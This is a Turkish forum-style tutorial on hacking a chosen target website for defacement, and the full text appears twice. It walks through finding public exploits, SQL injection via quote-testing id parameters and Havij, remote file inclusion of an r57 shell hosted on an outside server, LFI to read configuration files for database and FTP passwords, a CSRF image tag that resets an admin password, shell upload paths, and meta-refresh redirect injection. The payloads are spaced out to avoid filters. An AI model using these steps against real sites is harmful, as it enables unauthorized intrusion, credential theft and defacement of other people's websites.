Hedef Site Hackleme
İlk olarak şunu belirteyim ; programla hack olmaz hele hedef site hiç olmaz...
Ben bunu Acunetixle yada bilmemne tarayıcısı ile taradım, şunu bunu buldu aha hackliyeceğim diye bir şey yoktur. Bu şekilde hack yapamazsın!
Şimdi diyorsunuzdur ki içinizden : Eee nediyor bu adam böyle nasıl tarıyacaz, program olmadan.
Program olmadan hack nasıl yapacağız ?
Manual yni elle tarıyacağız...En iyi tarama yöntemi budur. Hatta tek iyi tarama yöntemi...
Doğru yapıldığı taktirde hacklemeniz garantidir... Tabii ki bir ihtimal olmayabilir.
En azından programların size verdiği gereksiz ve saçma log dosyalarından kurtulmuş olacağız...
Şimdi Öncelikle Hedef Sitemizi Tanımamız Gerekiyor
-Hangi Dilde Yazılmış? : Php,Asp,Html...
-Özel Bir Scripti Varmı? Vbulletin,mybb...
-Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birine mi Ait? Kişisel ve Firimasal Scriptler, Yahut diğer Scriptler...
__________________________________________________
EĞER SCRİPTİNİ BULDUYSANIZ ŞİMDİ O SCRİPTTE DAHA ÖNCEDEN BULUNMUŞ AÇIK VARMI ONA BAKALIM
Bunu öğrenmek için şu sitelerden script adını taratınız
Exploits Database by Offensive Security
En ünlü ve en ilgi gören exploit siteleri bunlardır... bunların dışında Başka Sitelerde de taratabilirsiniz. Ama Öncelikli tercih 1337. Arattık ve Açık
bulduk diyelim... Panele daldıktan sonra yapacaklarımız Neler? Napıcaz? oturup bekliyecek halimiz yok tabii ki...
-Exploitimizi kullanıp Admin paneline dalıyoruz.
-Shell upload ediyoruz.
-İndeximizi basıyoruz.
SHELL UPLOAD OLMUYORMU?
Hacklediğiniz bir siteye yönlendirerekindexin orda görünmesini sağlarız... Nasılmı Aşşağıdaki kodu ana sayfadaki bir dökümana herhangi ekliyerek
<m et a http-enquiv="re fre sh" c ontent="5;URL=http://www.yonlendireceksite.com
5 Beş sayısını azaltıp artırabilirsiniz bu saniye ayarıdır.
__________________________________________________
ARIYACAĞIMIZ MUHTEMEL AÇIKLAR;
Muhtemel Açıklar : SQL bugs, XSS bugs, XRSF-CSRF bugs, Lfi bugs, Html injection bugs, Upload bugs, Rfi bugs.
Bugs ve Admin zekasına yönelik açıklar (yani SM çekicez)
SONRA XSS AÇIKLARINI TARAYALIM
Sql bugs olması için öncelikle sitede id değerinin bulunması gerekir.
Şu Şekilde Yani :
.php?id=
.asp?id=
.aspx?id=
Bunlar gibi ID değeri varsa SQL açığı olabilir Açık olup olmadığını anlamak için ID değerinin sonuna " işareti koyup enterliyoruz Eğere site hata
veriyorsa Açık vardır. Bundan sonra manual veya havij ile yapılabilir.
Panele daldık nemi yapacağız.
Yukarda Anlatmıştım...
Video İle yapmak
Manual:
Havij:
RFI AÇIKLARINI TARAYALIM
Günümüzde nerdeyse hiç rastlamadığımız rfi açıkları artık ölü bir açık haline gelmiştir...
Nadir olsada bazı sitelerde rastlıyabiliyoruz...ID değerli yada include.php türü bir dosya lazım bize... Uzaktan dosya dahil edeceğimiz serverimize bu
şekilde... Misal bir Shell kodu olabilir bu. Peki nasıl mı yapacağız
http://hedefsite.com/include.php=Http://Kibrit.org/r57shell.txt
"?" mutlaka bulunmalıdır.
Açık varsa karşımıza çıkacaktır... Bizde indeximizi basarız...
LFI AÇIKLARINI TARAYALIM
LFI da artık karşımıza az çıkmaya başlayan bir açıktır... Pek etkili bir açık değildir aslında ama uğruna hedef siteye denemeye değer...
Bu açık sayesinde serverdeki bir dosyayı okuyabilsiniz...
Misal configuration.php yi okursanınz database şifresi , FTP şifresi gibi kritik bilgilere ulaşıp bağlantıyı kurup indexinizi basabilirsiniz.
CSRF-XRSF AÇIKLARINI TARAYALIM
CSRF-XRSF Browserlerin javascript çalıştırma desteği ile kişilere isteğinin dışında servere komut yollamasını sağlıyan kodlardır.
Bu açıklara
ÇOK RASTLARIZ. EN BÜYÜK SİSTEMLERDE DAHİ Gmailde vardı ama fixlendi...
Misal :
iz bunu bildiğimiz için bundan yararlanıcaz. Zaten amacımızda bu işlemlerimizi gerçekleştirebilecek kişiler oturum açmış durumdayken kullanarak
onlar yerine kendi kodlarımızı güvenilir kodlarmış gibi kullanıcıyı kullanarak gösterektir.
Ve bu saldırıları html veya javascript kullanara işlemesini sağlayabiliriz.
<img scr="http://hedefsite.com/management/change_password.php?new_pass=Kibrit&verify_pass=Ki brit&submited=1">
Örnek linke tıkladığımızda user, Eğer sitede oturum açmış durumda ise şifresini kibrit olmasını sağladık. Sonra yönetici girişi yapıp indeximizi
basabiliriz...
CSRF :
XRSF : Bulamadım
-----------------------------------------------------------------------
UPLOAD AÇIKLARINI TARIYALIM
Upload açıklarının yollarını bulmak zordur fakat rastlamak o kadar zor değildir.
Yani demek istediğim upload açıklarını ararsanız çok zor bulursunuz, Ancak o sizi tesadüfen bulur...
Muhtemel upload açıklı dosya yolları
-upload.php
-uploadimg.php
-uploader.php
Bu yollara başvurarak siteye Shell upload edip indexinizi basabilirsiniz...
HTML İNJECTİON AÇIKLARINI TARIYALIM
Sitelerde yorum ekleme yeri varsa html injenction olabilir... Ara sıra karşımıza çıkabilir denemekte fayda var
Me t a kodunu yorum başlığı kısmına yapıştırıp yönlendirebilirsiniz...
<m et a http-enquiv="ref re sh" con te nt="5;URL=http://www.hedefsite.com">
İşi garantiye almak istiyorsanız tüm satıra m e ta kodunu yapıştırabilirsiniz
İlk olarak şunu belirteyim ; programla hack olmaz hele hedef site hiç olmaz...
Ben bunu Acunetixle yada bilmemne tarayıcısı ile taradım, şunu bunu buldu aha hackliyeceğim diye bir şey yoktur. Bu şekilde hack yapamazsın!
Şimdi diyorsunuzdur ki içinizden : Eee nediyor bu adam böyle nasıl tarıyacaz, program olmadan.
Program olmadan hack nasıl yapacağız ?
Manual yni elle tarıyacağız...En iyi tarama yöntemi budur. Hatta tek iyi tarama yöntemi...
Doğru yapıldığı taktirde hacklemeniz garantidir... Tabii ki bir ihtimal olmayabilir.
En azından programların size verdiği gereksiz ve saçma log dosyalarından kurtulmuş olacağız...
Şimdi Öncelikle Hedef Sitemizi Tanımamız Gerekiyor
-Hangi Dilde Yazılmış? : Php,Asp,Html...
-Özel Bir Scripti Varmı? Vbulletin,mybb...
-Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birine mi Ait? Kişisel ve Firimasal Scriptler, Yahut diğer Scriptler...
__________________________________________________
EĞER SCRİPTİNİ BULDUYSANIZ ŞİMDİ O SCRİPTTE DAHA ÖNCEDEN BULUNMUŞ AÇIK VARMI ONA BAKALIM
Bunu öğrenmek için şu sitelerden script adını taratınız
Exploits Database by Offensive Security
En ünlü ve en ilgi gören exploit siteleri bunlardır... bunların dışında Başka Sitelerde de taratabilirsiniz. Ama Öncelikli tercih 1337. Arattık ve Açık
bulduk diyelim... Panele daldıktan sonra yapacaklarımız Neler? Napıcaz? oturup bekliyecek halimiz yok tabii ki...
-Exploitimizi kullanıp Admin paneline dalıyoruz.
-Shell upload ediyoruz.
-İndeximizi basıyoruz.
SHELL UPLOAD OLMUYORMU?
Hacklediğiniz bir siteye yönlendirerekindexin orda görünmesini sağlarız... Nasılmı Aşşağıdaki kodu ana sayfadaki bir dökümana herhangi ekliyerek
<m et a http-enquiv="re fre sh" c ontent="5;URL=http://www.yonlendireceksite.com
5 Beş sayısını azaltıp artırabilirsiniz bu saniye ayarıdır.
__________________________________________________
ARIYACAĞIMIZ MUHTEMEL AÇIKLAR;
Muhtemel Açıklar : SQL bugs, XSS bugs, XRSF-CSRF bugs, Lfi bugs, Html injection bugs, Upload bugs, Rfi bugs.
Bugs ve Admin zekasına yönelik açıklar (yani SM çekicez)
SONRA XSS AÇIKLARINI TARAYALIM
Sql bugs olması için öncelikle sitede id değerinin bulunması gerekir.
Şu Şekilde Yani :
.php?id=
.asp?id=
.aspx?id=
Bunlar gibi ID değeri varsa SQL açığı olabilir Açık olup olmadığını anlamak için ID değerinin sonuna " işareti koyup enterliyoruz Eğere site hata
veriyorsa Açık vardır. Bundan sonra manual veya havij ile yapılabilir.
Panele daldık nemi yapacağız.
Yukarda Anlatmıştım...
Video İle yapmak
Manual:
Kod:
http://www.youtube.com/watch?v=vVvFCrY3SVoHavij:
Kod:
http://www.youtube.com/watch?v=MqLBj0Io8V8RFI AÇIKLARINI TARAYALIM
Günümüzde nerdeyse hiç rastlamadığımız rfi açıkları artık ölü bir açık haline gelmiştir...
Nadir olsada bazı sitelerde rastlıyabiliyoruz...ID değerli yada include.php türü bir dosya lazım bize... Uzaktan dosya dahil edeceğimiz serverimize bu
şekilde... Misal bir Shell kodu olabilir bu. Peki nasıl mı yapacağız
http://hedefsite.com/include.php=Http://Kibrit.org/r57shell.txt
"?" mutlaka bulunmalıdır.
Açık varsa karşımıza çıkacaktır... Bizde indeximizi basarız...
Kod:
http://www.youtube.com/watch?v=iHo51gVwAkILFI AÇIKLARINI TARAYALIM
LFI da artık karşımıza az çıkmaya başlayan bir açıktır... Pek etkili bir açık değildir aslında ama uğruna hedef siteye denemeye değer...
Bu açık sayesinde serverdeki bir dosyayı okuyabilsiniz...
Misal configuration.php yi okursanınz database şifresi , FTP şifresi gibi kritik bilgilere ulaşıp bağlantıyı kurup indexinizi basabilirsiniz.
Kod:
http://www.youtube.com/watch?v=_uqEZM2KyNwCSRF-XRSF AÇIKLARINI TARAYALIM
CSRF-XRSF Browserlerin javascript çalıştırma desteği ile kişilere isteğinin dışında servere komut yollamasını sağlıyan kodlardır.
Bu açıklara
ÇOK RASTLARIZ. EN BÜYÜK SİSTEMLERDE DAHİ Gmailde vardı ama fixlendi...
Misal :
Kod:
http://www.hedefsite.com/management/change_password.php?new_pass=Kibritiz bunu bildiğimiz için bundan yararlanıcaz. Zaten amacımızda bu işlemlerimizi gerçekleştirebilecek kişiler oturum açmış durumdayken kullanarak
onlar yerine kendi kodlarımızı güvenilir kodlarmış gibi kullanıcıyı kullanarak gösterektir.
Ve bu saldırıları html veya javascript kullanara işlemesini sağlayabiliriz.
<img scr="http://hedefsite.com/management/change_password.php?new_pass=Kibrit&verify_pass=Ki brit&submited=1">
Örnek linke tıkladığımızda user, Eğer sitede oturum açmış durumda ise şifresini kibrit olmasını sağladık. Sonra yönetici girişi yapıp indeximizi
basabiliriz...
CSRF :
Kod:
http://www.youtube.com/watch?v=UJv0zHNuUr4XRSF : Bulamadım
-----------------------------------------------------------------------
UPLOAD AÇIKLARINI TARIYALIM
Upload açıklarının yollarını bulmak zordur fakat rastlamak o kadar zor değildir.
Yani demek istediğim upload açıklarını ararsanız çok zor bulursunuz, Ancak o sizi tesadüfen bulur...
Muhtemel upload açıklı dosya yolları
-upload.php
-uploadimg.php
-uploader.php
Bu yollara başvurarak siteye Shell upload edip indexinizi basabilirsiniz...
Kod:
http://www.youtube.com/watch?v=HIKo4i8CsIIHTML İNJECTİON AÇIKLARINI TARIYALIM
Sitelerde yorum ekleme yeri varsa html injenction olabilir... Ara sıra karşımıza çıkabilir denemekte fayda var
Me t a kodunu yorum başlığı kısmına yapıştırıp yönlendirebilirsiniz...
<m et a http-enquiv="ref re sh" con te nt="5;URL=http://www.hedefsite.com">
İşi garantiye almak istiyorsanız tüm satıra m e ta kodunu yapıştırabilirsiniz
Kod:
http://www.youtube.com/watch?v=XAoEtVejYwA
